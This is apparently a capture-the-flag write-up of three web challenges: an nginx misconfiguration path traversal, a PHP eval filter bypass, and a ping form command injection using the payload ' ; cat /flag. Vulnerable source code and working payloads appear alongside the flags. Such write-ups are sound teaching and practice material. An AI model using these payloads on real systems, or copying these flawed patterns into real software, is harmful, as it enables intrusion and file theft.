Our team got 5th
Solved Web challenges
Team score :
Welcome to Web Universe
Let’s warmup a little bit now with some cool stuffs! Web is really always the best!!
Link: http://20.119.58.135:4567/leetstatus
Author: Kahla
At first i didn’t know where to go and how to try to solve this i tried to check for robots.txt or index.php or index.html .. couldn’t find anything until i checked the source code that was provided
it seems like the website is running using nginx !
looking into main.py we see this :
from flask import Flask
import os
flag=os.getenv("FLAG")
app = Flask(__name__, static_url_path='/static/')
@app.route("/v1/status")
def index():
return "Everything is good afaik"
@app.route("/flag")
def flag():
return flag
if __name__ == '__main__':
app.run()
nginx config file :
server {
listen 80;
server_name welcome.task;
location /leet {
proxy_pass http://api:5000/v1/;
}
access_log off;
error_log /var/log/nginx/error.log error;
}
From this we can conclude that the "leet" part is like a prefix for the other webpages
After few googling i figured that we can try to find the path to /flag
===> path traversal !!
and this is possible because of the misconfiguration of nginx
you can read more about this here :
https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/
finally we find the path to be ../flag
Path : http://x.x.x.x/leet../flag
and we get our flag :
Securinets{Nginx_Is_NoT_ThaT_GooD_AftER_All}
PeeHpee
Dali likes PhP because it’s weird and has a lot of bugs. Is that really true ? Link: http://20.119.58.135:1234
Author: Kahla
we were provided this php source code
<?php
//Show Page code source
highlight_file(__FILE__);
require "secret.php";
if(isset($_GET["__"])&&isset($_GET["_"])){
$x=$_GET["__"];
$inp=preg_replace("/[^A-Za-z0-9$]/","",$_GET["_"]);
if($inp==="Kahla"){
die("Hacking Attempt detected");
}
else{
if(eval("return $inp=".$inp.";")==="Kahla"){
echo $flag;
}
else{
die("Pretty Close maybe ?");
}
}
}
?>
trying to send “Kahla” in the _ param prints out this prompt
Payload : http://20.119.58.135:1234/?__=&_=Kahla
Output :
We notice that we have the other __ param too that we haven’t tried to use yet
and it seems sorta useless but its there soo we might as well just use it right?
So we know that the code is filtering the word Kahla and won’t allow us to get the flag with it
So how about we use the __ to send it to the _ param? since it’s not verifying that param
Payload : http://20.119.58.135:1234/?__=Kahla&_=$_GET[__]
Output : 
well i guess we’re pretty close :/ ?
We can’t use the GET to send the param because the regex won’t allow the [] characters
But notice that we have a $x variable in the source code that takes the __ value !!
All we need to do is just to pass that through the _ param
Payload : http://20.119.58.135:1234/?__=Kahla&_=$x
Output : Securinets{PeehPee_1s_AlWAYs_H3r3}
And there’s our flag!
Broken Pinggyy
I’ve developed a simple web app to ping any IP/domain but i had some problems in my code .. I’m a newbie web developer so i’ll give the source code to help me. flag location => /flag Link: http://20.119.58.135:789/
Author: MONT4
We were presented by this webpage that allows us to ping other webpages but the website seems like its not working
I tried to get command injection using just ls or ; ls but nothing works
Looking through the provided source code we can see that there’s a typo in the ping command
Notice the ' before ping
so now we just need to add a ' before anything we type and we have to add ; to close out the first command
so our payload becomes
' ; ls
but we still don’t get anything ! well that’s because the flag is at /flag so we just need to cat that
Payload becomes :
' ; cat /flag
there’s our flag :
Securinets{Be_c4refuL_fr0m_C0mmand_1njection!!}